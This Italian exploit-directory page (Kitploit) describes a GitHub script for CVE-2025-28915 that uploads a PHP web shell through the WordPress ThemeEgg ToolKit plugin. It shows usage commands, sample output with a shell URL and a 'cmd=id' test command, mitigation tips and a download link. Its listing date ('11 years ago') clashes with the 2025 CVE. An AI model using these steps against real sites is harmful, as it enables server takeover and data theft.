Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-28915 — Plugin WordPress ThemeEgg ToolKit <= 1.2.9 - Vulnerabilità di caricamento arbitrario di file | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-28915
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubnxploited/cve-2025-28915

CVE-2025-28915

Plugin WordPress ThemeEgg ToolKit <= 1.2.9 - Vulnerabilità di caricamento arbitrario di file

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-28915 - Exploit per Arbitrary File Upload in WordPress ThemeEgg ToolKit

📌 Descrizione

Una vulnerabilità di Unrestricted File Upload nel plugin ThemeEgg ToolKit per WordPress (versioni ≤ 1.2.9) consente a attaccanti autenticati di caricare web shell sul server. Ciò può portare a esecuzione remota di codice (RCE), compromissione totale del sito web e accesso non autorizzato ai dati sensibili.

  • ID CVE: CVE-2025-28915
  • Gravità: 🔴 Critico (CVSS: 9.1)
  • Versioni interessate: ThemeEgg ToolKit ≤ 1.2.9
  • Vettore d'attacco: Autenticato, richiede un utente WordPress con privilegi sufficienti
  • Impatto: Compromissione totale del server, esecuzione di codice, esfiltrazione di dati

🔥 Panoramica dell'Exploit

Questo script automatizza lo sfruttamento di CVE-2025-28915:

  1. Verifica della versione del plugin per confermare la vulnerabilità.
  2. Accesso a WordPress utilizzando le credenziali fornite.
  3. Estrazione del nonce di sicurezza richiesto per l'autenticazione.
  4. Caricamento di una PHP Web Shell tramite l'endpoint vulnerabile.
  5. Fornitura dell'URL della shell per le attività post-exploitation.

🚀 Utilizzo

Prerequisiti:

  • Python 3.x
  • requests, beautifulsoup4

Installazione:

root@kitploit:~
pip install requests beautifulsoup4

Esempio di comando:

root@kitploit:~
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123

Argomenti:

ArgomentoDescrizione
-uURL WordPress di destinazione (es. http://target.com/wordpress)
-unNome utente WordPress
-pPassword WordPress

🎯 Esempio di Output dell'Exploit

root@kitploit:~
[+] Vulnerable version detected: 1.2.9
[+] Logged in successfully.
[+] Found security nonce: f82467a997
[*] Uploading Web Shell...
[+] Web Shell uploaded successfully!
[+] Potential Web Shell location: http://target.com/wp-content/uploads/2025/03/shell.php
[*] Test command: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id

⚠️ Mitigazione

  • Aggiorna ThemeEgg ToolKit a una versione corretta (>1.2.9).
  • Limita i caricamenti di file consentendo solo i tipi di file necessari.
  • Implementa plugin di sicurezza che blocchino i caricamenti di file non autorizzati.
  • Monitora i log per attività sospette.

📜 Disclaimer Legale

Questo script è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. L'uso non autorizzato è illegale e non etico. L'autore non si assume alcuna responsabilità per un uso improprio.

Di: Khaled Alenazi (Nxploit)

Scarica lo strumento